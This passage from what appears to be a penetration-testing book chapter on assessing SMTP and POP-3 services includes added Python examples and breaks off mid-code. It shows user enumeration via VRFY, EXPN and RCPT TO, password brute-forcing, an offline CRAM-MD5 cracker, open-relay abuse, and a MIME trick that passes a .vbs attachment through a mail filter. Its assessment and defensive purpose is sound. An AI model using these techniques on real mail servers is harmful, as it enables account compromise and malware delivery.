Email services serve and relay email messages across the Internet and private networks. Due to the nature of these services, channels between the Internet and corporate network space are opened, which determined attackers abuse to compromise internal networks. This chapter defines a strategy for assessing email services, through accurate service identification, enumeration of enabled options, and testing for known issues.
Common ports used for email delivery and collection through SMTP, POP-2, POP-3, and IMAP are as follows:
smtp          25/tcp
pop2         109/tcp
pop3         110/tcp
imap2        143/tcp
submission   587/tcp
SSL-wrapped versions of these mail services are often found running on the following ports:
smtps        465/tcp
imaps        993/tcp
pop3s        995/tcp
An SSL tunnel must first be established (using a tool such as stunnel) before these services can be assessed with tools that only speak plaintext; the standard assessment tools are then pointed at the local end of the tunnel. Note that many servers also offer STARTTLS on the plaintext ports (the EHLO reply in Example 11-5 advertises it), so a server with none of the SSL-wrapped ports open may still support encrypted sessions.
Most organizations with an Internet presence use email to communicate and to do business. Simple Mail Transfer Protocol (SMTP) servers provide email transport via software packages such as Sendmail, Microsoft Exchange, Lotus Domino, and Postfix. Here I discuss the techniques used to identify and exploit SMTP services.
Accurate identification of the SMTP service enables you to make sound decisions and efficiently assess the target system. Two tools in particular perform a number of tests to ascertain the SMTP service in use:
smtpmap (http://freshmeat.net/projects/smtpmap/)
smtpscan (http://www.greyhats.org/outils/smtpscan/smtpscan-0.2.tar.gz)
Both tools are launched from Unix-like platforms. Example 11-1 shows the smtpmap tool in use, identifying the mail service on mail.trustmatta.com as Lotus Domino 5.0.9a.
$ smtpmap mail.trustmatta.com
smtp-map 0.8
Scanning mail.trustmatta.com ( [ 192.168.0.1 ] mail )
100 % done scan
According to configuration the server matches the following :
Version Probability
Lotus Domino Server 5.0.9a 100 %
Microsoft MAIL Service, Version: 5.5.1877.197.1 90.2412 %
Microsoft MAIL Service, Version: 5.0.2195.2966 87.6661 %
According to RFC the server matches the following :
Version Probability
Lotus Domino Server 5.0.9a 100 %
AnalogX Proxy 4.10 85.4869 %
Sendmail 8.10.1 76.1912 %
Overall Fingerprinting the server matches the following :
Version Probability
Lotus Domino Server 5.0.9a 100 %
Exim 4.04 67.7031 %
Exim 4.10 (without auth) 66.7393 %
The smtpscan tool analyzes slightly different aspects of the SMTP service, predicting that the same SMTP service is Lotus Domino 5.0.8, as shown in Example 11-2.
$ smtpscan mail.trustmatta.com
smtpscan version 0.1
Scanning mail.trustmatta.com (192.168.0.1) port 25
15 tests available
77 fingerprints in the database
...............
Result --
250:501:501:250:501:250:250:214:252:252:502:250:250:250:250
SMTP server corresponding :
- Lotus Domino Release 5.0.8
Most of the time an accurate SMTP service banner is presented, so deep analysis isn’t required. Example 11-3 shows that the mail server is running Lotus Domino version 6 beta.
A number of exploitable issues in SMTP services such as Microsoft Exchange depend on support for certain Extended SMTP (ESMTP) features. These subsystems and features are enumerated by issuing an EHLO command upon connecting to the target SMTP server, as shown in Example 11-4.
$ telnet 192.168.0.104 25
Trying 192.168.0.104...
Connected to 192.168.0.104.
Escape character is '^]'.
220 uranus.local Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Wed, 27 Jun 2007 21:38:52 +0200
EHLO world
250-uranus.local Hello [192.168.0.15]
250-TURN
250-SIZE
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250-X-EXPS GSSAPI NTLM
250-AUTH GSSAPI NTLM
250-X-LINK2STATE
250-XEXCH50
250 OK
QUIT
221 2.0.0 uranus.local Service closing transmission channel
You can find details of Extended SMTP features online at http://en.wikipedia.org/wiki/smtp_extension.
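As an added example (editorial code, not the book's or any tool's), the following Python parses an EHLO reply into a table of extensions and flags the ones this chapter singles out: VRFY, the Exchange XEXCH50 and X-LINK2STATE verbs, NTLM and plaintext AUTH mechanisms, and AUTH offered without STARTTLS. The sample reply is the Example 11-4 output re-typed as constructed test data; the mapping in NOTES is an assumption drawn from this chapter's text rather than a vulnerability oracle, and live_ehlo() queries a real server with the standard library's smtplib.

```python
import smtplib

# Constructed input: the EHLO reply from Example 11-4, re-typed as sample data
# so the parser can be exercised without a network connection.
SAMPLE_EHLO_REPLY = """250-uranus.local Hello [192.168.0.15]
250-TURN
250-SIZE
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250-X-EXPS GSSAPI NTLM
250-AUTH GSSAPI NTLM
250-X-LINK2STATE
250-XEXCH50
250 OK"""

# Extensions this chapter singles out and why a tester cares. This mapping is an
# assumption built from the chapter text; presence of a verb is a lead, not a finding.
NOTES = {
    "VRFY": "VRFY enabled: local user enumeration possible (see the Sendmail examples)",
    "EXPN": "EXPN enabled: alias and user expansion possible",
    "TURN": "TURN enabled: legacy verb that should be disabled on Internet-facing servers",
    "XEXCH50": "Exchange XEXCH50 verb present: check patch level for CVE-2003-0714",
    "X-LINK2STATE": "Exchange X-LINK2STATE verb present: check patch level for CVE-2005-0560",
}


def parse_ehlo(reply):
    """Turn a multi-line EHLO reply into {EXTENSION: [params]} with upper-cased keys.
    The first 250- line is the greeting and is skipped; the trailing '250 OK' is ignored.
    The old 'AUTH=LOGIN PLAIN' spelling (Example 11-5) is folded into AUTH."""
    exts = {}
    lines = [ln.strip() for ln in reply.splitlines() if ln.strip()]
    for ln in lines[1:]:
        if not ln.startswith("250"):
            continue
        body = ln[4:].strip()                 # drop "250-" or "250 "
        if not body or body.upper() == "OK":
            continue
        name, *params = body.split()
        name = name.upper()
        if name.startswith("AUTH="):
            params = [name[5:]] + params
            name = "AUTH"
        current = exts.setdefault(name, [])
        for p in params:
            if p not in current:
                current.append(p)
    return exts


def assess(exts):
    """Return human-readable observations for the extensions found."""
    findings = [NOTES[k] for k in NOTES if k in exts]
    for mech in exts.get("AUTH", []):
        if mech.upper() == "NTLM":
            findings.append("AUTH NTLM offered: NTLM authentication reachable over SMTP "
                            "(see the LSASS discussion)")
        elif mech.upper() in ("LOGIN", "PLAIN"):
            findings.append(f"AUTH {mech.upper()} offered: password crosses the wire "
                            "base64-encoded, so it is both sniffable and brute-forceable")
    if "AUTH" in exts and "STARTTLS" not in exts:
        findings.append("AUTH offered without STARTTLS: credentials cannot be protected in transit")
    return findings


def live_ehlo(host, port=25, helo="world", timeout=10):
    """Query a real server. smtplib parses the reply into esmtp_features (lower-cased
    keys, params as one string); normalise it to the shape parse_ehlo() returns."""
    with smtplib.SMTP(host, port, timeout=timeout) as s:
        code, _ = s.ehlo(helo)
        if code != 250:
            raise RuntimeError(f"EHLO rejected with {code}")
        return {k.upper(): v.split() for k, v in s.esmtp_features.items()}


if __name__ == "__main__":
    for line in assess(parse_ehlo(SAMPLE_EHLO_REPLY)):
        print("-", line)
```

live_ehlo("mail.example.org") returns the same dictionary shape that parse_ehlo() produces for the sample, so assess() applies to either. Extension names are compared case-insensitively because, as the Exchange reply shows (8bitmime), servers do not agree on case.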
Upon identifying an SMTP server that supports authentication (AUTH) methods, as shown in Example 11-5, we can perform a brute-force password grinding attack to compromise valid credentials.
$ telnet mail.example.org 25
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
220 mail.example.org ESMTP
EHLO world
250-mail.example.org
250-AUTH LOGIN CRAM-MD5 PLAIN
250-AUTH=LOGIN CRAM-MD5 PLAIN
250-STARTTLS
250-PIPELINING
250 8BITMIME
The SMTP server at mail.example.org supports three very common authentication types, as follows:
LOGIN (plaintext authentication using base64 encoding)
PLAIN (variant plaintext authentication using base64 encoding)
CRAM-MD5 (MD5 shared secret authentication, RFC 2195)
The LOGIN authentication mechanism can be attacked using THC Hydra using the smtp-auth command-line option to perform brute-force password grinding for known user accounts. Other less common SMTP authentication mechanisms, supported by other mail servers, include:
DIGEST-MD5 (HTTP digest compatible challenge-response scheme, RFC 2831)
GSSAPI (Kerberos V authentication via the GSSAPI)
NTLM (Microsoft NT LAN Manager authentication, http://curl.haxx.se/rfc/ntlm.html)
OTP (one-time password mechanism, RFC 2444)
Unfortunately, publicly available brute-force password grinding tools don’t exist for these authentication mechanisms at this time. Deeper technical discussion of various authentication mechanisms can be undertaken through reviewing the respective RFC documents and browsing Wikipedia.
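The mechanisms above differ in what a network observer or a password-grinding tool gets to see. As an added example (editorial code, not from the book), the following Python builds the exact strings a client sends for AUTH PLAIN and AUTH LOGIN, decodes a captured PLAIN blob straight back to the password, computes and verifies a CRAM-MD5 exchange, and, going beyond the text, shows that a captured CRAM-MD5 challenge/response pair can be ground offline against a wordlist even though the password itself never crosses the wire. The challenge string, account name and passwords are constructed.

```python
import base64
import hashlib
import hmac

# Constructed challenge in the <id@host> form servers use; not taken from a real session.
SAMPLE_CHALLENGE_B64 = base64.b64encode(b"<[email protected]>").decode()


def auth_plain(user, password, authzid=""):
    """AUTH PLAIN (RFC 4616): one base64 blob of authzid NUL authcid NUL password.
    The reply is a bare 235 or 535, so one connection can test many guesses."""
    return base64.b64encode(f"{authzid}\0{user}\0{password}".encode()).decode()


def decode_auth_plain(blob):
    """What a sniffer sees: the AUTH PLAIN blob decodes directly to the password."""
    authzid, user, password = base64.b64decode(blob).decode().split("\0", 2)
    return authzid, user, password


def auth_login_steps(user, password):
    """AUTH LOGIN: two base64 lines sent in answer to the server's 334 prompts
    (VXNlcm5hbWU6 is 'Username:', UGFzc3dvcmQ6 is 'Password:')."""
    return [base64.b64encode(user.encode()).decode(),
            base64.b64encode(password.encode()).decode()]


def cram_md5_response(user, password, challenge_b64):
    """CRAM-MD5 (RFC 2195): the server sends base64(challenge); the client answers
    base64('user ' + hex(HMAC-MD5(password, challenge))). The password never crosses
    the wire, but the response is a keyed hash over data the attacker also saw."""
    challenge = base64.b64decode(challenge_b64)
    digest = hmac.new(password.encode(), challenge, hashlib.md5).hexdigest()
    return base64.b64encode(f"{user} {digest}".encode()).decode()


def verify_cram_md5(response_b64, challenge_b64, secrets):
    """Server side: recover the user, recompute with the stored shared secret, compare.
    `secrets` maps user -> password; CRAM-MD5 obliges the server to keep either the
    plaintext password or an MD5 context for it, which is a weakness in its own right."""
    user, _, _digest = base64.b64decode(response_b64).decode().rpartition(" ")
    if user not in secrets:
        return False
    expected = cram_md5_response(user, secrets[user], challenge_b64)
    return hmac.compare_digest(expected, response_b64)


def crack_cram_md5(challenge_b64, response_b64, wordlist):
    """Offline attack on a captured exchange: the challenge is public, so each
    candidate password costs one HMAC-MD5 and no further contact with the server.
    Returns the matching password or None."""
    user, _, _digest = base64.b64decode(response_b64).decode().rpartition(" ")
    for candidate in wordlist:
        if cram_md5_response(user, candidate, challenge_b64) == response_b64:
            return candidate
    return None


if __name__ == "__main__":
    print("AUTH PLAIN", auth_plain("chris", "secret"))
    print("AUTH LOGIN", auth_login_steps("chris", "secret"))
    resp = cram_md5_response("chris", "secret", SAMPLE_CHALLENGE_B64)
    print("CRAM-MD5 ", resp, "->", crack_cram_md5(SAMPLE_CHALLENGE_B64, resp, ["password", "secret"]))
```

The practical consequence for the brute-forcer is that LOGIN and PLAIN can be ground online with any client that can base64-encode, while CRAM-MD5 needs either online guessing (one HMAC per attempt, which the server happily answers) or a single captured exchange for offline guessing; neither gives the protection that people tend to assume from the phrase "the password is never sent".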
If NTLM authentication is supported, LSASS overflows (CVE-2003-0818 and CVE-2003-0533) can be launched to execute arbitrary code server-side. At the time of this writing, neither CORE IMPACT nor MSF support LSASS attacks through SMTP in this way, but Immunity CANVAS has an exploit for CVE-2003-0818 through SMTP, as shown here:
$ ./exploits/asn1/asn1.py
Available versions:
0 : Autoversioning N/A
1 : Exploit LSASS.EXE through SMB (use default, port: 445)
2 : Exploit LSASS.EXE through IIS (use default, port: 80)
3 : Exploit LSASS.EXE through IIS HTTPS (use default, port: 443)
4 : Exploit LSASS.EXE through NETBIOS (use default, port: 139)
5 : Exploit LSASS.EXE through EXCHANGE (use default, port: 25, unstable)
Poorly configured SMTP services are used to relay unsolicited email, in much the same way as open web proxy servers. Example 11-6 shows a poorly configured Microsoft Exchange server being abused by an attacker to relay email. Increasingly, servers that correctly refuse anonymous relaying are still abused as relays through authenticated sessions, because user accounts with weak passwords are brute-forced using the mechanisms discussed in the previous section.
$ telnet mail.example.org 25
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
220 mail.example.org Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sun, 5 Oct 2003 18:50:59 +0100
HELO
250 mail.example.org Hello [192.168.0.1]
MAIL FROM: [email protected]
250 2.1.0 [email protected] OK
RCPT TO: [email protected]
250 2.1.5 [email protected]
DATA
354 Start mail input; end with <CRLF>.<CRLF>
This is a spam test!
.
250 2.6.0 <[email protected]> Queued mail for delivery
QUIT
Most systems respond to a RCPT TO: request in the following manner if you attempt to relay unsolicited email through them:
RCPT TO: [email protected]
550 5.7.1 Unable to relay for [email protected]
Microsoft KB article 324958 (http://support.microsoft.com/?kbid=324958) describes how to secure open SMTP relays when using Microsoft Exchange.
Most Unix-based systems run Sendmail, including Linux, Solaris, OpenBSD, and others. Sendmail is particularly vulnerable to information leak attacks in which local account usernames can be extracted, and also process manipulation attacks in which Sendmail functions such as prescan( ) are abused to execute arbitrary code.
If the Sendmail banner is obfuscated or modified, the true version of Sendmail can usually be ascertained by issuing a HELP command, as shown in Example 11-7; in this case it reveals that the server is running Sun Microsystems Sendmail 8.9.3.
$ telnet mx4.sun.com 25
Trying 192.18.42.14...
Connected to nwkea-mail-2.sun.com.
Escape character is '^]'.
220 nwkea-mail-2.sun.com ESMTP Sendmail ready at Tue, 7 Jan 2003 02:25:20 -0800 (PST)
HELO world
250 nwkea-mail-2.sun.com Hello no-dns-yet.demon.co.uk [62.49.20.20] (may be forged), pleased to meet you
HELP
214-This is Sendmail version 8.9.3+Sun
214-Commands:
214-    HELO    MAIL    RCPT    DATA    RSET
214-    NOOP    QUIT    HELP    VRFY    EXPN
214-For more info use "HELP <topic>".
214-smtp
214-To report bugs in the implementation contact Sun Microsystems
214-Technical Support.
214-For local information contact postmaster at this site.
214 End of HELP info
Valid local user account details can be enumerated by issuing EXPN, VRFY, or RCPT TO: commands, as shown in the following examples.
The Sendmail EXPN command is historically used to expand details for a given email address, as shown in Example 11-8.
$ telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet you
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <[email protected]>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
By analyzing the responses to these EXPN commands, I ascertain that the test user account doesn't exist, mail for root is forwarded to [email protected], and an sshd user account is allocated for privilege separation (privsep) purposes.
The Sendmail VRFY command is typically used to verify that a given SMTP email address is valid. I can abuse this feature to enumerate valid local user accounts, as detailed in Example 11-9.
$ telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet you
VRFY test
550 5.1.1 test... User unknown
VRFY chris
250 2.1.5 Chris McNab <chris@mail2>
The RCPT TO: technique is extremely effective at enumerating local user accounts on most Sendmail servers. Many security-conscious network administrators ensure that EXPN and VRFY commands don't return user information, but RCPT TO: enumeration takes advantage of the fact that Sendmail checks whether a local recipient exists as soon as the RCPT TO: command is issued, and that behaviour cannot be removed without accepting (and later bouncing) mail for nonexistent users. Example 11-10 shows standard HELO and MAIL FROM: commands being issued, along with a plethora of RCPT TO: commands to enumerate local users.
$ telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet you
MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:chris
250 2.1.5 chris... Recipient ok
Even Sendmail services protected by a firewall SMTP proxy (such as the SMTP fixup functionality within Cisco PIX) are vulnerable to the RCPT TO: attack. Example 11-11 demonstrates how suspicious commands such as EXPN, VRFY, and HELP are filtered (the proxy masks the banner with asterisks and rewrites the disallowed verbs to XXXX before passing them on, so the server rejects them as unrecognized), but RCPT TO: enumeration is still possible.
$ telnet 10.0.10.10 25
Trying 10.0.10.10...
Connected to 10.0.10.10.
Escape character is '^]'.
220 ************************0*0*0*0*0*0*******2******2002********0
HELO world
250 mailserv.trustmatta.com Hello onyx [192.168.0.252], pleased to meet you
EXPN test
500 5.5.1 Command unrecognized: "XXXX test"
VRFY test
500 5.5.1 Command unrecognized: "XXXX test"
HELP
500 5.5.1 Command unrecognized: "XXXX"
MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:chris
250 2.1.5 chris... Recipient ok
RCPT TO:nick
250 2.1.5 nick... Recipient ok
Both RCPT TO: and VRFY user enumeration attacks can be automatically launched from the Brutus brute-force utility available from http://www.hoobie.net/brutus/. The Brutus program uses plug-ins known as Brutus Application Definition (BAD) files, and the following BAD files allow you to perform user enumeration attacks:
http://www.hoobie.net/brutus/smtp_vrfy_user.bad
http://www.hoobie.net/brutus/smtp_rcpt_user.bad
mailbrute is another utility that can enumerate valid user accounts through this technique. The tool, which is available from http://examples.oreilly.com/networksa/tools/mailbrute.c, can be compiled and run from any Unix-like environment.
Over the years, plenty of remote vulnerabilities have been found in Sendmail. At the time of this writing, the MITRE CVE list details the following serious vulnerabilities in Sendmail (not including denial-of-service or locally exploitable issues), as shown in Table 11-1.
CVE reference | Date | Notes
CVE-2006-0058 | 22/03/2006 | Sendmail 8.13.5 signal handler race condition resulting in arbitrary code execution. |
CVE-2004-0833 | 27/09/2004 | Sendmail 8.12.3 Debian 3.0 sasl configuration creates SMTP open relay through default account settings. |
CVE-2003-0694 | 17/09/2003 | The prescan( ) function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code. |
CVE-2003-0161 | 29/03/2003 | The prescan( ) function in Sendmail before 8.12.9 doesn’t properly handle certain conversions from char and int types, causing denial of service or possible execution of arbitrary code. |
CVE-2002-1337 | 03/03/2003 | Buffer overflow in Sendmail 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, as processed by the crackaddr( ) function of headers.c. |
CVE-2002-0906 | 28/06/2002 | Sendmail 8.12.4 and earlier, if running in a nondefault configuration, can be compromised by an attacker using an authoritative DNS server to provide a malformed TXT record to the mail server upon connecting. |
CVE-1999-1506 | 29/01/1990 | Vulnerability in SMI Sendmail 4.0 and earlier, on SunOS up to 4.0.3, allows remote bin access. |
CVE-1999-0206 | 08/10/1996 | MIME overflow in Sendmail 8.8.0 and 8.8.1. |
CVE-1999-0204 | 23/02/1995 | Sendmail 8.6.9 remote ident overflow. |
CVE-1999-0163 | Unknown | In older versions of Sendmail, an attacker could use a pipe character to execute root commands. |
CVE-1999-0047 | 01/01/1997 | MIME overflow in Sendmail 8.8.3 and 8.8.4. |
Exploit scripts for these vulnerabilities are publicly
available from archive sites such as Packet Storm (http://www.packetstormsecurity.org). At the time of
this writing, neither MSF nor Immunity CANVAS support any of these
Sendmail issues. CORE IMPACT supports CVE-2002-1337 (Sendmail
8.12.7 crackaddr( )
overflow).
A number of serious remotely exploitable issues have been identified in the Microsoft Exchange SMTP service over the last few years. A number of zero-day denial-of-service issues also exist in Microsoft Exchange at the time of this writing, one of which is found in the Argeniss exploit pack for Immunity CANVAS. In light of this, it is not advisable to run the service exposed to the public Internet. Table 11-2 lists remotely exploitable issues as found in MITRE CVE at the time of this writing.
CVE reference | Date | Notes
CVE-2007-0213 | 08/05/2007 | Exchange Server 2007 base64-encoded MIME message overflow. |
CVE-2006-0027 | 09/05/2006 | Exchange Server 2003 SP2 message calendar (iCal) attachment heap overflow. |
CVE-2006-0002 | 10/01/2006 | Exchange Server 2000 SP3 TNEF MIME attachment overflow. |
CVE-2005-0560 | 12/04/2005 | Exchange Server 2003 X-LINK2STATE command overflow. |
CVE-2005-0044 | 08/02/2005 | Exchange Server 2003 OLE data input validation vulnerability. |
CVE-2004-0840 | 12/10/2004 | Windows Server 2003 and Exchange 2003 SMTP engine DNS response overflow. |
CVE-2003-0714 | 15/10/2003 | Exchange Server 2000 allows remote attackers to execute arbitrary code via a crafted XEXCH50 request. |
CVE-2002-0698 | 25/07/2002 | Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, triggering a buffer overflow. |
CVE-2002-0055 | 27/02/2002 | SMTP service in Windows 2000, Windows XP Professional, and Exchange Server 2000 malformed BDAT command denial-of-service vulnerability. |
CVE-2002-0054 | 27/02/2002 | SMTP service in Windows 2000 and Exchange Server 5.5 allows mail relay through a null AUTH command. |
CVE-2000-1006 | 31/10/2000 | Exchange Server 5.5 malformed MIME header denial-of-service vulnerability. |
CVE-1999-1043 | 24/07/1998 | Exchange Server 5.5 malformed SMTP data denial-of-service vulnerability. |
CVE-1999-0945 | 24/07/1998 | Exchange Server 5.5 AUTH and AUTHINFO denial-of-service vulnerability. |
CVE-1999-0682 | 06/08/1999 | Exchange Server 5.5 allows a remote attacker to relay email using encapsulated SMTP addresses. |
CVE-1999-0284 | 01/01/1998 | Exchange Server 5.0 HELO denial-of-service bug. |
Exploit scripts for these vulnerabilities are publicly available from archive sites such as Packet Storm (http://www.packetstormsecurity.org). At the time of this writing, MSF only supports CVE-2003-0714 (XEXCH50 overflow). Immunity CANVAS supports CVE-2003-0714 and CVE-2005-0560 (X-LINK2STATE overflow), and CORE IMPACT supports CVE-2003-0714, CVE-2005-0560, and CVE-2006-0027 (iCal attachment heap overflow).
GLEG VulnDisco doesn’t cover any Microsoft Exchange Server issues at this time, but the Argeniss 0day ultimate exploits pack contains a zero-day, unpatched, DoS exploit for Exchange Server 2003 and a DoS exploit for a known bug in Exchange Server 2000 (CVE-2007-0213).
Many organizations run inbound SMTP relay servers that can scrub email to detect and remove viruses, spam, and other adverse material before forwarding the email message to the internal network. These services can be circumvented and bypassed in some cases, as discussed next.
In 2000, I identified a serious flaw in Clearswift MAILsweeper 4.2 that used malformed MIME headers to relay viruses without being quarantined. Since then, other security issues have been identified within MAILsweeper that can relay viruses unchecked. Table 11-3 summarizes the issues identified in MAILsweeper as listed in the MITRE CVE list at http://cve.mitre.org.
CVE reference(s) | Date | Notes |
CVE-2006-3215 and CVE-2006-3216 | 21/06/2006 | MAILsweeper 4.3.19 character set security bypass issues |
CVE-2003-1154 | 05/11/2003 | MAILsweeper 4.3.9 zip archive processing vulnerability |
CVE-2003-0928, CVE-2003-0929, and CVE-2003-0930 | 07/08/2003 | MAILsweeper 4.3.14 multiple issues relating to processing compressed archive attachments |
CVE-2003-1330 | 03/02/2003 | MAILsweeper 4.3.6 SP1 and prior “on strip successful” filter bypass |
CVE-2003-0121 | 03/03/2003 | MAILsweeper 4.3.7 and prior MIME encapsulation filter bypass |
CVE-2001-1581 | 10/04/2001 | MAILsweeper 4.2 and prior “file blocker” filter bypass |
The malformed MIME headers issue was reported to the vendor in February 2001 and is listed in Table 11-3 as CVE-2003-1330. The technique was extremely simple, involving two MIME fields related to email attachments (filename and name).
Example 11-12 shows a legitimate email message and attachment generated by Outlook or any current email client, from [email protected] to [email protected] with the text/plain attachment report.txt.
From: John Smith <[email protected]>
To: Mickey Mouse <[email protected]>
Subject: That report
Date: Thurs, 22 Feb 2001 13:38:19 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.23)
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_02D35B68.BA121FA3"
Status: RO

This message is in MIME format. Since your mail reader doesn't understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; charset="iso-8859-1"

Mickey,

Here's that report you were after.

------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; name="report.txt"
Content-Disposition: attachment; filename="report.txt"

< data for the text document here >

------_=_NextPart_000_02D35B68.BA121FA3--
The vulnerability exists because the MAILsweeper SMTP relay and the Outlook email client take the attachment's name from different MIME fields. The MAILsweeper gateway reads the name value (report.txt) when processing and scanning the file for viruses and malicious code, whereas the Outlook client reads the filename value (report.txt) when opening and processing the file on the user desktop.
Any type of malicious virus or Trojan horse program can pass through this filter and make its way to the user desktop by modifying the MIME name and filename values. To send a malicious executable, set the name value to something unobjectionable that won't be scanned for virus code (report.txt) and the filename value to a type that the client will execute (report.vbs), as shown here:
------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; name="report.txt"
Content-Disposition: attachment; filename="report.vbs"
There are plenty of these issues within filtering packages such as MAILsweeper. It is therefore important that networks are set up with defense in depth to prevent known viruses from being pushed through such filters and making their way to the user desktop.
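The gateway-side fix for the name/filename split is to stop trusting either field alone. As an added example (editorial code, not MAILsweeper's or the book's), the following Python walks a message with the standard library's email package, pulls both names from each attachment, reports when they disagree, and judges the extension of every name on offer, including the one the client will actually use (get_filename() prefers Content-Disposition filename and falls back to Content-Type name, the same precedence Outlook applied). The two messages are constructed on the pattern of Example 11-12 rather than copied from it, and the extension list is an assumption.

```python
import email
import email.utils
import os

# Constructed messages on the pattern of Example 11-12 (addresses and text are made up).
CLEAN_MSG = b"""\
From: John Smith <[email protected]>
To: Mickey Mouse <[email protected]>
Subject: That report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="iso-8859-1"

Mickey, here's that report you were after.
--BOUNDARY
Content-Type: text/plain; name="report.txt"
Content-Disposition: attachment; filename="report.txt"

quarterly figures
--BOUNDARY--
"""

# The same message with only the Content-Disposition filename changed, as in the text.
EVIL_MSG = CLEAN_MSG.replace(b'filename="report.txt"', b'filename="report.vbs"')

# Assumption: extensions a gateway should never let through unscanned.
DANGEROUS_EXT = {".vbs", ".exe", ".scr", ".js", ".bat", ".cmd", ".pif", ".com"}


def _as_str(value):
    """get_param() returns a tuple for RFC 2231-encoded parameters; flatten it."""
    if isinstance(value, tuple):
        return email.utils.collapse_rfc2231_value(value)
    return value


def attachment_names(part):
    """Return (Content-Type name, Content-Disposition filename) for one MIME part."""
    ct_name = _as_str(part.get_param("name"))
    cd_name = _as_str(part.get_param("filename", header="content-disposition"))
    return ct_name, cd_name


def scan_attachments(raw):
    """Walk every leaf part and report those whose names disagree or whose
    names carry a dangerous extension. The gateway must judge the worst of the
    two names, not the one it happens to read first."""
    findings = []
    msg = email.message_from_bytes(raw)
    for part in msg.walk():
        if part.is_multipart():
            continue
        ct_name, cd_name = attachment_names(part)
        if not ct_name and not cd_name:
            continue                                  # not an attachment
        names = {n for n in (ct_name, cd_name) if n}
        exts = {os.path.splitext(n)[1].lower() for n in names}
        finding = {
            "content_type_name": ct_name,
            "disposition_filename": cd_name,
            "client_will_use": part.get_filename(),  # filename= wins, name= is the fallback
            "mismatch": len(names) > 1,
            "dangerous": bool(exts & DANGEROUS_EXT),
        }
        if finding["mismatch"] or finding["dangerous"]:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    print("clean:", scan_attachments(CLEAN_MSG))
    print("evil: ", scan_attachments(EVIL_MSG))
```

A mismatch between the two names is itself a strong signal, since no legitimate client produces one; blocking or quarantining on that alone catches this class of bypass without having to guess which field the next client will honour.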
To learn more, check CVE-2002-1121 in the MITRE CVE list at http://cve.mitre.org, which relates to RFC 2046 message fragmentation and assembly. The following SMTP gateway products are susceptible to mail-fragmentation issues:
Post Office Protocol 2 and 3 (POP-2 and POP-3) are end user email services. POP-2 services are very rare nowadays, as most organizations use POP-3, which listens on TCP port 110 (or port 995 if using SSL or TLS to provide network encryption). Common POP-3 email services include Qualcomm QPOP (also known as qpopper; it runs on many Unix platforms) and the POP-3 component of Microsoft Exchange. These services are traditionally vulnerable to brute-force password grinding and process manipulation attacks.
After performing enumeration and identifying local user accounts through Sendmail and other avenues, it is trivial to perform a brute-force password grinding attack. As I’ve discussed throughout the book so far, tools such as Brutus and THC Hydra are used to perform fast brute-force password grinding attacks.
Most POP-3 services are susceptible to brute-force password grinding, for the following reasons:
They don’t pay attention to account lockout policies.
They allow a large number of login attempts before disconnecting.
They don’t log unsuccessful login attempts.
Many specific Unix-based POP-3 brute-force tools exist and can be found in the Packet Storm archive, including:
http://packetstormsecurity.org/groups/adm/adm-pop.c
http://packetstormsecurity.org/crackers/pop_crack.tar.gz
http://packetstormsecurity.org/crackers/hv-pop3crack.pl
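To measure the first two weaknesses (no lockout, many attempts per connection) rather than assume them, the following Python is an added example (editorial code, not one of the Packet Storm tools above): it opens one POP-3 connection with the standard library's poplib, issues deliberately wrong passwords, and counts how many the server answers before it drops the connection. So that the block runs offline it also includes a constructed stand-in server that tolerates five failures and logs nothing; point pop3_attempts_per_connection() at a real host and port to test a live service. The account name and credentials are made up.

```python
import poplib
import socketserver
import threading


class FakePop3Handler(socketserver.StreamRequestHandler):
    """Constructed stand-in for a weak POP-3 daemon: no lockout, no logging, and it
    answers MAX_FAILURES bad passwords on one connection before dropping it."""
    MAX_FAILURES = 5
    CREDENTIALS = {"chris": "s3cret"}     # made-up account

    def handle(self):
        self.wfile.write(b"+OK POP3 ready\r\n")
        user, failures = None, 0
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"+OK\r\n")
            elif cmd == "PASS":
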